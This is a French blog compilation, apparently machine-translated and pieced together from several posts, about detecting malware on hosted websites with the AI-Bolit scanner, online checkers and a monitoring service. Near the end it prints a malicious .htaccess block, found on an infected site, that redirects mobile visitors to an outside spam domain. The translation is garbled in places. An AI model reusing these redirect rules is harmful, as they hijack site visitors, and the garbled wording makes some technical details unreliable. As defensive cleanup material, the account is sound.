Programme Aibolit pour le traitement des virus. AI-Bolit - un scanner efficace pour les virus et autres codes malveillants sur l'hébergement

Tous ceux qui créent des sites sont probablement confrontés à des virus et des chevaux de Troie sur le site. Le premier problème est de constater le problème à temps, jusqu'au moment où les projets attrapent le pessimisme des moteurs de recherche ou la charge de l'hébergeur (ddos, spam).

Cet article est écrit dans la foulée, lorsque, lors d'une sauvegarde normale sur une machine sous Windows, les sources du site ESET intelligent La sécurité a soudainement commencé à jurer sur les images, qu'il considérait comme un virus. Il s'est avéré qu'à l'aide d'images, la porte dérobée FilesMan a été inondée sur le site.

Le problème était que le script qui permettait aux utilisateurs de télécharger des images sur le site vérifiait que l'image était chargée uniquement par extension de fichier. Le contenu n'a pas du tout été vérifié. Vous n'avez pas besoin de le faire ;) Par conséquent, tout fichier php sous couvert d'une image. Mais il ne s'agit pas de trous...

Le fait est qu'il y avait une tâche de vérification quotidienne de tous les fichiers du site pour les virus et les chevaux de Troie.

Recherche de virus sur un site en ligne

En ligne, toutes sortes de vérifications de site pour les virus ne conviennent pas du tout à ces fins. Les robots d'exploration en ligne se comportent comme un robot de moteur de recherche, parcourant de manière séquentielle toutes les pages disponibles du site. Le passage à la page suivante du site s'effectue par le biais de liens provenant d'autres pages du site. Rép. si un attaquant a téléchargé une porte dérobée sur votre site en utilisant une image et qu'il n'y a aucun lien vers cette image n'importe où sur les pages du site et n'a pas défiguré le site, tout comme mettre un virus sur les pages, alors vérification en ligne site pour les virus ne trouvera tout simplement pas cette image et ne trouvera pas le virus.

Pourquoi, demandez-vous, un attaquant ferait-il cela ? Pourquoi télécharger une porte dérobée et ne rien faire ? Je vais répondre - pour le spam, pour les ddos. Pour toute autre activité malveillante qui n'affecte en aucune façon les pages du site.

En un mot, la vérification en ligne d'un site pour les virus est complètement inutile pour une tranquillité d'esprit totale.

Plugin pour vérifier le site WordPress pour les virus et les chevaux de Troie

Il existe un excellent plugin antivirus pour WordPress. C'est appelé. Dans mon cas, il a parfaitement trouvé les images de FilesMan et nettoyé le site des virus. Mais il a un inconvénient important. Lors de la vérification, il donne une charge sauvage sur le serveur, car il trie simplement tous les fichiers de manière séquentielle. De plus, la vérification de la boîte se fait uniquement manuellement. Il n'est pas possible d'automatiser la vérification du site avec un plugin.

Eh bien, vous pouvez attraper un virus en contournant WordPress, vous avez besoin de quelque chose d'universel.

Vérification du contenu du site avec un antivirus régulier

Comme mentionné ci-dessus, les problèmes ont été découverts tout à fait par accident par un antivirus de bureau classique lors d'une sauvegarde. Bien sûr, vous pouvez télécharger l'intégralité du site tous les jours et le vérifier avec un antivirus régulier. Tout cela est tout à fait réalisable.

• Tout d'abord, je veux l'automatisation. Pour que la vérification soit en mode automatique et sur la base des résultats, un rapport était prêt.
• deuxièmement, il existe de tels sites qu'il n'est tout simplement pas réaliste de les télécharger tous les jours,

Essayer AI-Bolit

Quelque chose avec l'introduction que j'ai resserré. À la suite de toutes les recherches, j'ai trouvé un merveilleux Antivirus gratuit pour site. . Cet antivirus est sous-entendu différents régimes Son usage. Je l'ai utilisé via ssh.

S'il est possible de l'utiliser sur un hébergement partagé - je n'ai pas compris, mais je pense que c'est possible. AI-Bolit est écrit en php et peut être exécuté depuis un navigateur. Par conséquent, purement techniquement, c'est probablement possible sur une plate-forme partagée.

Important! Aibolit ne guérit pas le site des virus - il les TROUVE SEULEMENT et signale les fichiers qu'il juge dangereux. Et vous décidez quoi faire avec eux. Par conséquent, cliquer simplement bêtement sur le bouton et guérir le site des chevaux de Troie ne fonctionnera pas.

Comment utiliser AI-Bolit sur VDS avec ssh

Aibolit a des instructions et des cours de maître sur la façon d'utiliser cet antivirus. À cas général la suite est simple :

• Télécharger
• décompresser sur le serveur (j'ai décompressé sur /root/ai)
• puis depuis la console ssh lancez php /root/ai/ai-bolit/ai-bolit.php
• la vérification peut prendre des heures, selon la taille du site
• sur la base des résultats de la vérification, un fichier de rapport AI-BOLIT-REPORT- sera généré<дата>-<время>.html

Les fichiers problématiques seront visibles dans le fichier de rapport, le cas échéant.

Charge élevée sur le serveur

Le principal problème que vous rencontrez lors de la recherche automatique de virus sur un site est la charge sur le serveur. Tous les antivirus agissent de la même manière, triant séquentiellement tous fichiers disponibles. Et aibolit ne semble pas faire exception ici. Il prend simplement tous les fichiers et les vérifie un par un. La charge saute et cela peut prendre beaucoup de temps, ce qui n'est pas acceptable en production.

Mais l'aibolit a une opportunité folle (à condition d'avoir un serveur à part entière ou des vds avec accès root). Dans un premier temps, pour un aibolit, vous pouvez créer une liste de fichiers à vérifier, puis alimenter cette liste. Ensuite, l'aibolit passera simplement en revue cette liste.

Pour former la liste, vous pouvez utiliser n'importe quelle méthode de serveur. J'ai ce script bash :

# bash /root/ai/run.sh # https://revisium.com/kb/ai-bolit-console-faq.html DOMAIN="website" AI_PATH="/root/ai" NOW=$(date +" %F-%k-%M-%S") # vous pouvez créer un dossier public avec un accès par mot de passe REPORT_PATH="$AI_PATH/reports/$DOMAIN-$NOW.html" SCAN_PATH="/home/azzrael/web/$ DOMAIN/ public_html/" SCAN_DAYS=90 #php /home/admin/ai/ai-bolit/ai-bolit.php --mode=1 --path=$SCAN_PATH --report=$REPORT_PATH # Analyse uniquement les fichiers modifiés dans X jours # AI-BOLIT-DOUBLECHECK.php codé en dur par l'auteur d'aibolit à --with-2check !!! trouver $SCAN_PATH -type f -ctime -$SCAN_DAYS > "$AI_PATH/ai-bolit/AI-BOLIT-DOUBLECHECK.php" #trouver $SCAN_PATH -type f -name "*.ph*" -ctime -$SCAN_DAYS > " $AI_PATH/ai-bolit/AI-BOLIT-DOUBLECHECK.php" #find $SCAN_PATH -type f -ctime -$SCAN_DAYS > "$AI_PATH/ai-bolit/AI-BOLIT-DOUBLECHECK.php" #find $SCAN_PATH -type f -name "*.ph*" -o -name "*.gif" -ctime -$SCAN_DAYS > "$AI_PATH/ai-bolit/AI-BOLIT-DOUBLECHECK.php" php "$AI_PATH/ai-bolit/ai -bolit.php" --mode=1 --report=$REPORT_PATH --with-2check #history -c

Ici, on peut voir qu'à travers trouver la commande nous collectons tous les fichiers créés lors des derniers SCAN_DAYS, les sauvegardons dans la liste AI-BOLIT-DOUBLECHECK.php (malheureusement, il était impossible de renommer le fichier liste au moment de l'utilisation), puis nous alimentons cette liste à l'aibolit. SCAN_DAYS peut être égal à un jour. Si vous mettez bash /root/ai/run.sh dans le cron quotidien, la liste des fichiers à vérifier peut ne pas être très longue. Rép. la vérification ne prendra pas beaucoup de temps et ne chargera pas lourdement le serveur.

AI-Bolit est un scanner gratuit avancé pour les portes dérobées, les coques de pirates, les virus et les portes. Le script est capable de rechercher du code malveillant et suspect dans les scripts, détecte les liens de spam, affiche Version CMS et les paramètres de sécurité critiques pour le serveur.

L'efficacité du scanner réside dans l'utilisation de modèles et d'heuristiques, plutôt que dans la recherche de hachage habituelle.

Histoire de la création

Actuellement, le marché des logiciels antivirus pour Ordinateur personnel extrêmement développé : solutions bien connues de Kaspersky, Dr.Web, McAfee, Norton, Avast et autres. Avec les scanners de virus et de codes malveillants pour les sites Web, les choses ne sont pas si roses. Administrateurs système et les propriétaires de sites, préoccupés par le problème de trouver du code malveillant sur leurs serveurs, sont obligés d'utiliser des scripts écrits par eux-mêmes qui recherchent des virus et des shells en certains fragments collectés auparavant. J'ai fait la même chose. A collecté des shells, des virus, des portes dérobées, des codes de redirection à partir de sites clients et a progressivement constitué une base de données de signatures de codes malveillants. Et pour que ce soit pratique à utiliser, j'ai écrit un petit script en PHP.

Peu à peu, le scanner a acquis des fonctionnalités utiles, et finalement il est devenu évident qu'il pourrait être utile non seulement pour moi.
En avril 2012, j'ai annoncé le script AI-Bolit sur plusieurs forums, et six mois plus tard, il est devenu le principal outil de recherche de code malveillant auprès des webmasters et des administrateurs d'hébergement. Quant aux statistiques totales, en un an et demi, le script a été téléchargé plus de 64 000 fois. Et le script a reçu un certificat de droit d'auteur dans Rospatent.

Caractéristiques du scanneur

La principale différence entre AI-Bolit et les scanners de virus et de codes malveillants actuellement existants sur le serveur est l'utilisation de modèles comme signatures de virus. La recherche de code malveillant est basée sur des expressions régulières, et non sur un hachage ou sommes de contrôle, qui vous permet de détecter même les shells modifiés et masqués insérés dans des modèles ou des scripts CMS.

Le scanner peut fonctionner en mode d'analyse rapide (uniquement pour les fichiers PHP, HTML, JS, htaccess), en mode "expert", exclure les répertoires et les fichiers par masque. Il dispose également d'une grande base de données de listes blanches CRC de CMS populaires, ce qui réduit considérablement le nombre de faux positifs.

Actuellement, la base de données du scanner contient plus de 700 signatures de scripts malveillants. Les signatures sont des expressions régulières, ce qui vous permet de trouver, par exemple, de tels shells et backdoors obfusqués que ni LMD avec ClamAV, ni même les antivirus de bureau ne peuvent trouver :

La base de données des signatures est régulièrement mise à jour avec de nouveaux échantillons trouvés par les spécialistes de Revizium et les utilisateurs de scripts, ce qui vous permet de maintenir le scanner à jour.

Interface AI-Bolit

L'interface d'AI-Bolit est très simple. Il s'agit d'un script PHP qui peut s'exécuter dans ligne de commande via PHP CLI ou ouvert dans le navigateur avec l'URL http://website/ai-bolit.php?p=password.

Le résultat du script est un rapport composé de quatre sections :

1. Statistiques et informations généralesà propos du scénario.
2. Section des notes critiques rouges avec une liste des shells, virus et autres codes malveillants trouvés (ou fragments similaires à du code malveillant).
3. Section d'avertissement orange (extraits de code suspects souvent utilisés dans les outils de piratage).
4. Section bleue des recommandations (liste des répertoires ouverts à l'écriture, Paramètres PHP etc).

L'utilisateur analyse le rapport reçu en affichant des extraits, trouve et supprime manuellement les scripts malveillants et les fragments de code à l'aide d'outils ou de programmes de ligne de commande pour rechercher et remplacer des chaînes dans des fichiers.

Le principal problème auquel un développeur d'analyseur de virus est généralement confronté est de trouver un terrain d'entente entre la "paranoïa" (sensibilité) de l'analyseur et le nombre de faux positifs. Si seules des chaînes fixes sont utilisées pour rechercher du code malveillant, l'efficacité du scanner devient faible, car les fragments masqués, le code avec des espaces et des tabulations et le code intelligemment formaté ne seront pas trouvés. Si vous effectuez une recherche par modèles flexibles, il existe une forte probabilité de faux positifs lorsque des scripts sûrs garantis sont marqués comme malveillants.

Dans AI-Bolit, je résous ce problème en utilisant deux modes de fonctionnement ("normal" / "expert") et des listes blanches pour des CMS bien connus.

L'avenir d'AI-Bolit

Dans les plans pour le développement du script - un grand nombre de fonctionnalités utiles et intégration avec d'autres solutions antivirus. L'un des points clés est l'intégration d'AI-Bolit avec les bases ClamAV et LMD. Ainsi, AI-BOLIT pourra également rechercher des rootkits et des shells par des sommes de contrôle.

La deuxième chose importante dans la file d'attente pour la mise en œuvre est une interface pratique pour analyser les rapports tabulaires avec une recherche et des filtres flexibles. Il sera possible de filtrer les fichiers trouvés par extensions, trier par taille, sommes de contrôle, etc.

Le troisième point est la mise en place d'une analyse asynchrone en utilisant AJAX, qui résoudra le problème de vérification des sites hébergés sur des hébergements faibles, qui ont une consommation CPU ou un temps d'exécution des scripts limité. Pour le moment, cela ne peut être résolu qu'en analysant une copie du site localement ou sur un autre serveur plus puissant. Et bien sûr mises à jour constantes bases de données de signatures de logiciels malveillants.

Enfin

Le code du script est ouvert, hébergé sur GitHub, donc tout le monde peut contribuer au développement de ce projet. Envoyez-moi vos suggestions et souhaits à [courriel protégé].

AI-Bolit - un scanner efficace pour les virus et autres codes malveillants sur l'hébergement

On nous demande souvent - quelle est la particularité du scanner AI-Bolit ? En quoi est-il différent des autres outils de détection de logiciels malveillants similaires tels que maldet, clamav ou même les antivirus de bureau ? La réponse courte est qu'il est plus efficace pour détecter le code malveillant écrit en PHP et Perl. Pourquoi? Réponse ci-dessous.

Chaque jour, le code malveillant (hackers web shells, backdoors, etc.) devient plus sophistiqué et complexe. En plus de l'obscurcissement des identifiants et du cryptage du code

les appels de fonction implicites ont commencé à être utilisés partout à travers des méthodes avec des arguments appelables, des gestionnaires et des appels de fonction indirects.

Il y a de moins en moins de scripts malveillants avec une structure linéaire et des identifiants fixes. Ils essaient de déguiser le code et de le rendre le plus volatil possible, « polymorphe »

ou vice versa, rendez-le aussi simple que possible et ressemblez à un script normal.

Parfois, lors de l'analyse d'un script malveillant, il est impossible d'isoler un fragment fixe permettant d'identifier de manière unique le « malware ». Évidemment, un tel code malveillant ne peut pas être trouvé à l'aide d'une simple base de données de signatures (base de données antivirus), qui est utilisée dans la grande majorité des antivirus Web et des scanners hébergés. Pour recherche efficace« malware » moderne, il est nécessaire d'utiliser des méthodes plus sophistiquées pour déterminer les modèles de virus et, dans certains cas, des heuristiques. C'est l'approche que nous utilisons dans le scanner de logiciels malveillants AI-BOLIT.
L'utilisation d'une grande base de données de modèles flexibles en constante amélioration basés sur des expressions régulières, l'utilisation d'analyses heuristiques supplémentaires, développées sur la base de l'analyse d'un grand nombre de sites infectés, ont fait du scanner AI-Bolit l'outil le plus efficace et le plus activement utilisé pour administrateurs et développeurs web.

AI-Bolit a également gagné en popularité grâce à interface simple et la possibilité d'une utilisation gratuite à des fins non commerciales. Tout webmaster peut absolument télécharger gratuitement AI-Bolit depuis le site officiel http://revisium.com/ai/ et vérifier sa ressource pour les coques de piratage, les portes dérobées, les portes, les virus, les spams, liens cachés et d'autres fragments et inserts malveillants. Le scanner est également activement utilisé par des sociétés commerciales - studios Web, sociétés d'hébergement et agences Internet pour vérifier et traiter les sites des clients. Les hébergeurs intègrent AI-Bolit dans le panneau de contrôle, les développeurs Web l'utilisent pour rechercher du code malveillant et dans leurs propres services de surveillance de site.

Vous trouverez ci-dessous une petite liste des fonctionnalités du scanner Ai-Bolit :

• exécuter depuis la console et le navigateur
• trois modes de scan ("simple", "expert", "paranoïaque") et deux modes de fonctionnement ("express" et "full scan")
• rechercher des scripts php et perl de pirates (shells, portes dérobées), des insertions virales, des portes, des expéditeurs de spam, des scripts de vente de liens, des scripts de camouflage et d'autres types de scripts malveillants. Recherche de modèles et d'expressions régulières, et utilisation d'heuristiques pour identifier le code potentiellement malveillant
• recherche de signatures dans des blocs de texte cryptés et fragmentés et des séquences codées hex/oct/déc
• Rechercher dossiers suspects avec des constructions utilisées dans des scripts malveillants
• rechercher des liens cachés dans les fichiers
• recherche de liens symboliques
• code de recherche pour la recherche et les redirections mobiles et bien plus encore.

Page de script officielle

Êtes-vous sûr que vos sites ne sont pas infectés par des virus ? Avez-vous vérifié le site dans antivirus en ligne e ? Oubliez, les antivirus en ligne ne seront jamais en mesure de trouver des virus cousus sur votre site par des pirates qualifiés.

Tout au plus, ils peuvent identifier les scripts malveillants que vous avez vous-même installés sur votre site Web par indiscrétion. Par conséquent, des méthodes plus radicales sont nécessaires pour rechercher des virus sur le site, qui peuvent non seulement sauter par-dessus les sommets, mais aussi regarder à l'intérieur de votre projet.

Comment vérifier la présence de virus sur un site Web moyennant des frais et gratuitement ?

Cet article parlera de plusieurs façons de vérifier la présence de virus sur votre site :

Les antivirus en ligne sont le moyen le plus simple, mais aussi le moins fiable.

L'antivirus Aibolit est le moyen le plus fiable, mais aussi le plus difficile.

Antivirus du site Virusday - la meilleure option.

Mais d'abord, un peu sur la dangerosité du virus sur le site.

À quel point un piratage de site est-il dangereux ?

Mais au début, un peu de théorie et d'expérience personnelle - ils m'ont cassé plus d'une fois. Pourquoi le site est-il infecté par un virus ? Après avoir accédé à votre site, les attaquants peuvent effectuer les opérations suivantes :

Ils commenceront à « fusionner » votre trafic avec leurs projets.
Télécharger le contenu du serveur et de la base de données pour les vendre à des tiers.
Ils modifieront les informations de contact ou de paiement sur le site, téléchargeront les données personnelles des utilisateurs.
Ils placeront des portes avec des liens de spam sur votre site.
Ils introduiront des virus, des chevaux de Troie ou des exploits dans les pages du site, infectant les visiteurs.
Envoyez des spams depuis votre serveur.
Ils vendront l'accès au site piraté à d'autres attaquants pour une pénétration non autorisée ultérieure.

Il est important de comprendre : les sites contenant des virus peuvent faire l'objet de sanctions moteurs de recherche et perdre des positions. Mon hébergement a déjà été bombardé par des pirates plus d'une fois, faisant tomber . Pourquoi est-ce? L'objectif est simple : accéder à vos mots de passe ou télécharger un virus sur votre site via une vulnérabilité dans le code.

Et ils réussissent, car j'ai déjà supprimé deux fois les portes qui en sont remplies de mes sites. Mais c'est la moitié du problème, puisque mes sites ont été infectés par la suite, et même changer les mots de passe n'aide guère. Et il n'y a tout simplement aucune garantie que tout ne se reproduira pas.

Ensuite, lorsque je saisis à nouveau l'adresse, je vais également sur le site et le panneau d'administration. Qu'est-ce qui ne va pas, je ne sais toujours pas. Sur ce site, mon plus récent, il n'y a rien de tel. Alors et sous Attaques DDOS il n'a pas encore touché...

Le moyen le plus simple de soigner un site est de tout démolir et de réinstaller le script du site. Mais, comme vous le savez, il s'agit d'une mesure extrême, à laquelle il ne faut recourir qu'en dernier recours. De plus, un code malveillant peut être cousu dans un modèle, mais vous ne pouvez pas le remplacer. Par conséquent, nous devons d'abord essayer de déterminer si notre site est infecté ou non ? Comment faire?

Où vérifier la présence de virus sur le site en ligne ?

Recherche de virus sur un site en ligne - bien que cette méthode ne soit pas la plus efficace, comme je l'ai écrit ci-dessus, vous pouvez commencer par elle. Il y a un bon service Alarme antivirus .

Entrez simplement l'adresse du site et attendez que le service vérifie la présence de virus sur votre site. S'il trouve quelque chose de suspect, il le publiera dans le rapport. Mais si même cet antivirus en ligne ne trouve rien, essayez une solution plus avancée.

Comment vérifier la présence de virus sur un site avec un script ?

Il y a à peine une semaine, j'ai vérifié tous mes sites avec l'antivirus Aibolit et j'ai constaté que mon site principal était infecté.

Qu'est-ce que cet antivirus et comment l'utiliser ?

Cet antivirus peut être téléchargé depuis le site Web des développeurs - Aibolit . Au ce moment il existe une version pour Windows, auparavant il était possible de travailler uniquement via l'hébergement.

Que peut faire cet antivirus pour un site Web? C'est ce que:

- recherche de virus, scripts malveillants et pirates sur l'hébergement : shells basés sur des signatures et des modèles flexibles, shells basés sur des heuristiques simples - tout ce que les antivirus et scanners ordinaires ne peuvent pas trouver.
- recherchez les scripts vulnérables timthumb, fckeditor, uploadify et un certain nombre d'autres.
- recherchez les redirections dans .htaccess vers des sites malveillants.
- recherchez le code des échanges de liens, comme sape/trustlink/linkfeed/… dans les fichiers .php
— définir des répertoires et des fichiers de porte.
— recherchez les liens vides (liens invisibles) dans les modèles.
— afficher les répertoires ouverts en écriture.
— fonctionne avec tous les cms sans exception (joomla, wordpress, drupal, dle, bitrix, phpbb,…)
— envoyer le rapport par e-mail ou l'enregistrer dans un fichier.

L'installation est simple : décompressez l'archive et téléchargez les fichiers ai-bolit.php, .aignore, .aurlignore du dossier ai-bolit et le fichier du dossierknown_files dans le dossier avec notre site Web, qui correspond à la version de notre CMS, dans mon cas c'est .aknown.wp_3_8_1 pour wordpress. Vous devrez peut-être définir les autorisations de fichier correctes, 755 par exemple.

Eh bien, pour ceux qui ont le bon hébergement, vous devez entrer dans le terminal (j'ai Linux, donc aucun émulateur n'est nécessaire) puis vous connecter à notre hébergement via SSH.

Ssh LOGIN@SERVER_ADDRESS

Comment le faire exactement, je n'expliquerai pas, si vous n'êtes pas dans le sujet, alors une approche individuelle est nécessaire ici, écrivez dans les commentaires, je vais vous expliquer.

Après la connexion, vous devez aller avec la commande cd dans le dossier avec le site. Ensuite, nous donnons la commande :

php ai-bolit.php

Après cela, la numérisation commencera, ce qui durera assez longtemps, en fonction de la taille du site. Après la fin, un fichier avec un nom approximatif apparaîtra dans le dossier avec le site AI-BOLIT-REPORT-07-04-2014_23-10-719945.html

Nous ouvrons le dossier et analysons quoi et comment. J'ai eu, par exemple, au tout début:

Signatures de script shell trouvées. Suspicion d'un script malveillant : (12)

Mais en fait, il s'est avéré qu'il n'y avait qu'un seul virus, et le reste des réponses concernait des certificats qui ressemblaient à des enregistrements cryptés.

Le moyen le plus simple de comprendre cela est de télécharger un wordpress propre, ou tout ce que vous avez là-bas, et de comparer les fichiers suspects. Si tout est identique dans l'original, il n'y a pas lieu de s'inquiéter. Eh bien, sinon, nous supprimons le code malveillant. Ensuite, j'ai maudit :

Double extension, contenu crypté ou script malveillant suspecté. Analyse supplémentaire requise : (14)

L'antivirus a juré sur un plugin - TOP 10 - Je ne suis pas sûr qu'il y ait un problème. De même, d'autres dangers étaient des faux positifs.

L'analyse heuristique maudite aussi fichiers wordpress, mais j'ai vérifié avec les originaux et tout allait bien.

Ces fichiers contiennent des liens invisibles. Suspicion de spam de lien :

Ici, je suis un plugin qui crée un bouton UP - il avait un lien caché.

Bien qu'en ce qui concerne les plugins, vous devez comprendre que presque tous ont des liens. Mais cela se résout élémentairement, en fermant le dossier avec les plugins d'indexation. Dans wordpress, cela peut être fait en entrant la ligne dans robot.txt Interdire : /wp-content/plugins

Dans chaque cas, tout sera très individuel, il est donc difficile d'écrire quelque chose de spécifique. Le but de l'article est plus de donner une direction.

Tout irait bien ici, mais il manque une chose - une surveillance constante. Vous n'exécuterez pas cet antivirus tous les jours et les pirates travaillent sept jours sur sept. Et ici, un autre excellent service nous aidera. Comment vérifier un site pour un virus avec un service ?

Vérification automatique du site pour les virus

Il n'y a pas si longtemps, il y avait un service Virusday , qui peut simplement surveiller en permanence le site pour l'absence de virus. Tout a l'air très agréable et fonctionnel, le traitement des sites contre les virus est le plus pratique ici :

Vous devez leur ajouter votre site et télécharger le fichier php de synchronisation, qui est téléchargé à la racine du site. Ensuite, vous pouvez démarrer la synchronisation et le service vérifiera la présence de virus sur votre site.

À version gratuite les possibilités sont limitées, donc si votre site vous est cher, vous pouvez payer un peu et dormir paisiblement - le service lui-même recherchera les virus et les traitera immédiatement.

Eh bien, un virus a été trouvé sur un site. Ce site ne faisait que charger mon serveur jusqu'à ce que je désactive le protocole de publication à distance. Le problème a disparu, mais le virus demeure :

Eh bien, essayons d'éliminer l'infection. Non, ce n'était pas là, le service ne veut pas supprimer le virus gratuitement, il n'a donné que les informations suivantes :

Menaces détectées:h.ExternalRedirect
Le fichier de configuration du serveur WEB contient des instructions qui redirigent conditionnellement ou inconditionnellement les utilisateurs du site vers des ressources tierces. Retrait recommandé.

Comment supprimer un virus que j'ai trouvé sur un site ? Je vais essayer de le trouver manuellement, ou peut-être que je vais me connecter à un forfait payant, car la sécurité du site est très importante. Bien que, très probablement, j'ai apporté cette infection à partir d'un hébergement partagé, maintenant j'ai super VPS et il n'y a eu aucun problème. Donc, inscrivez-vous pour virusday et connectez votre site.

Voici comment vérifier la présence de virus sur votre site, si vous connaissez plus de moyens, et même mieux que ceux-ci, alors tout le monde serait intéressé à les connaître ...

Hier, j'ai eu un incident pas très agréable - tous mes sites ont été infectés. C'est bien que j'étais devant l'ordinateur et que j'ai immédiatement remarqué le problème. Qu'est-il arrivé?

Un de mes sites a été soudainement transféré sur une sorte de site de rencontres, un site indécent, pour ne pas dire plus. Lorsque je suis allé sur mon domaine, j'ai été immédiatement redirigé vers ce site de spam.

C'est une très mauvaise situation, car si vous ne résolvez pas immédiatement le problème, vous pouvez effrayer les visiteurs. Et si ça dure longtemps, alors moteurs de recherche peut imposer un filtre sur votre site et vous perdrez toutes les positions dans la recherche.

J'ai déjà écrit quelque chose à ce sujet, mais dans ce cas nécessaires pour trouver le virus rapidement. J'ai immédiatement commencé à rechercher manuellement le code malveillant.

Étant donné que la redirection provenait de toutes les pages, j'ai pensé à quel type de script j'avais été introduit dans l'en-tête (header.php) ou le pied de page (footer.php). Mais il n'y avait pas de code étranger.

J'ai immédiatement contacté le service d'assistance à l'hébergement :

- J'ai un site comme celui-ci, il a commencé à rediriger vers une sorte de ressource indécente, aidez-moi à résoudre le problème.

Mais avant qu'ils aient eu le temps de me répondre, j'ai moi-même deviné où chercher. Dans le fichier .htaccess, qui se trouve à la racine du site, j'ai trouvé ce code :

RewriteEngine sur RewriteBase / RewriteCond %(HTTP_USER_AGENT) android|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|pad)|iris|kindle|lge |maemo|meego.+ mobile|midp|mmp|netfront|palm(os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(navigateur|lien)| vodafone|wap|windows (ce|téléphone)|xda|xiino RewriteCond %(HTTP_USER_AGENT) ^(1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s- )|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di |-m|r |s)|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u )|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob |do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze) |fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p |t)|hei-|hi(pt|ta)|hp(i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu( aw|tc)|i-(20|go|ma)|i230|iac(|-|/)|ibro|idée|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro |jemu|jigs|kddi|keji|kgt (|/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg(g|/(k|l|u)|50|54|-)|libw|lynx| m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(di|rc|ri)|mi(o8|oa|ts)|mmef |mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v)|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1) |10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan( a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt- g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma| mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar| sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v) |sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo |to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk (40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-|)|webc|avec|wi( g |nc|nw)|wmlb|wonu|x700|yas-|votre|zeto|zte-) RewriteRule ^$ _http://luxurytds.com/go.php?sid=1 # BULLETPROOF .50.8 >>>>> >> .HTACCÈS SÉCURISÉ

Une fois que je l'ai retiré, tout a fonctionné comme il se doit. Il m'a fallu 5 minutes pour tout faire. Mais s'il y avait un novice complet à ma place, cela pourrait lui prendre beaucoup de temps, s'il pouvait même trouver le problème lui-même.

À ma grande horreur, j'ai découvert que tous mes sites étaient infectés de cette façon. J'ai immédiatement résolu le problème et écrit au support d'hébergement :

Tous mes sites étaient infectés, ce qui veut dire que tout sur votre hébergement était également infecté, ce serait pas mal d'avertir les gens.

À quoi la réponse a suivi:

"Infectés" uniquement les fichiers de vos sites. Par conséquent, dans certains (certains) de vos sites, il existe une vulnérabilité qui permet de modifier les fichiers de votre compte. Vous devez contacter un développeur Web pour trouver et corriger ces vulnérabilités.

Peut-être que oui, ne vérifiez pas. Ce n'est pas la première fois que mes sites sur cet hébergement tentent d'infecter. Est-ce que tous les webmasters ont de tels problèmes ? Ou est-ce uniquement sur mon hébergement ?

Ce n'est pas mon premier hébergement et nulle part je n'ai eu de tels problèmes. Je suis de plus en plus enclin à changer d'hébergeur, par exemple pour CETTE.

Avant que j'ai eu le temps de résoudre ce problème, le support technique m'a écrit que mon autre site envoyait du spam. Il s'est avéré qu'un fichier php étranger a été téléchargé dans le dossier avec un plugin, et du spam a été envoyé d'une manière ou d'une autre par son intermédiaire.

J'ai supprimé ce fichier et le problème a été résolu. J'ai déjà clairement l'impression que WordPress est le même Windows, et Que dois-je faire avec ça?